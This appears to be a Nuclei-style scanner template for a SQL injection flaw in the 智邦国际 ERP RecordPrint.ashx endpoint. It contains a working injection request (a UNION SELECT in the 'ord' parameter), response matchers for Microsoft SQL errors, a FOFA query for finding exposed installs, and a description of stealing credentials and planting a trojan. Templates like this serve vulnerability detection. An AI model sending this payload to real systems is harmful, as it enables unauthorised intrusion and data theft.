http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - 在将 nvarchar 值
            - 转换成数据类型 int 时失败
            - Microsoft SQL
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /SYSN/json/pcclient/RecordPrint.ashx?sort=1&ord=-1'%20union%20select%20@@version-- HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
id: zhibangguojiERP-RecordPrint_ashx-sql
info:
    author: Superhero
    description: |-
        fofa: app="智邦国际-企业管理软件"
        智邦国际ERP RecordPrint.ashx 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 智邦国际ERP RecordPrint.ashx SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/OYSTfv35eKp78j9JsSm0uw
    severity: high
    tags:
        - 智邦国际ERP
        - ecor
        - ECOR
